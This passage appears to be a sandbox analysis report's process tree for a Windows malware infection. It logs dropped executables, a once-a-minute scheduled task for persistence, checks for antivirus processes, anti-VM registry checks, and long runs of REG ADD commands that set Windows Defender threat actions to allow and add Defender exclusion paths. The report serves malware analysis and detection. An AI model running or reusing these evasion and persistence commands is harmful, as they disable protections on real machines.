        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        
        PID:2768
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        
        PID:4284
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:4184
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        
        PID:4688
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:3552
      - C:\Users\Admin\AppData\Local\Temp\1000241001\ISetup8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000241001\ISetup8.exe"
        6⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\u4m0.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u4m0.0.exe"
        7⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 1096
        8⤵
        Program crash
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\u4m0.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u4m0.1.exe"
        7⤵
        
        PID:3160
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 692
        7⤵
        Program crash
        
        PID:6132
      - C:\Users\Admin\AppData\Local\Temp\1000242001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000242001\toolspub1.exe"
        6⤵
        
        PID:5380
      - C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe"
        6⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe"
        7⤵
        
        PID:4376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3144
    - - C:\Users\Admin\AppData\Local\Temp\1000095001\angelfederal.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000095001\angelfederal.exe"
        5⤵
        
        PID:5356
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Less Less.cmd & Less.cmd & exit
        6⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:5932
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        7⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:5384
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        7⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 22922
        7⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "cointaskspuzzleshelena" Do
        7⤵
        
        PID:1504
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Definitions + Places + Decent + Recordings + Introductory + Parts 22922\W
        7⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\22922\Acids.pif
        
        22922\Acids.pif 22922\W
        7⤵
        
        PID:1460
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 127.0.0.1
        7⤵
        Runs ping.exe
        
        PID:3328
- - C:\Users\Admin\AppData\Local\Temp\1000020001\3d9ab43b67.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\3d9ab43b67.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:3936
- - C:\Users\Admin\1000021002\9f804f8a84.exe
    "C:\Users\Admin\1000021002\9f804f8a84.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3660
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3440
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdd899ab58,0x7ffdd899ab68,0x7ffdd899ab78
        5⤵
        
        PID:4444
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1872,i,9256618922101558561,454760160313129004,131072 /prefetch:2
        5⤵
        
        PID:1504
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1872,i,9256618922101558561,454760160313129004,131072 /prefetch:8
        5⤵
        
        PID:5036
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2184 --field-trial-handle=1872,i,9256618922101558561,454760160313129004,131072 /prefetch:8
        5⤵
        
        PID:796
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1872,i,9256618922101558561,454760160313129004,131072 /prefetch:1
        5⤵
        
        PID:2912
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3180 --field-trial-handle=1872,i,9256618922101558561,454760160313129004,131072 /prefetch:1
        5⤵
        
        PID:464
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4100 --field-trial-handle=1872,i,9256618922101558561,454760160313129004,131072 /prefetch:1
        5⤵
        
        PID:1140

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 832 -ip 832
1⤵
PID:2324

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6124 -ip 6124
1⤵
PID:936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 776 -ip 776
1⤵
PID:5440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:6032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5244 -ip 5244
1⤵
PID:5640

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:3104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 5852 -ip 5852
1⤵
PID:5136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5976 -ip 5976
1⤵
PID:5128

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:5988
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2912
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:5864
- - C:\Windows\Temp\194654.exe
    "C:\Windows\Temp\194654.exe" --list-devices
    3⤵
    PID:3668

C:\Users\Admin\AppData\Local\Temp\7zS11F8.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS11F8.tmp\Install.exe it /LDxdidlPpp 385118 /S
1⤵
PID:5600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:432
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5752
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2896
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4912
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4504
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5348
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:916
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5436
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5472
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:2088
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5752
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5280
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5800
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:660
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5920
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5088
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5320
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3552
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5940
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD 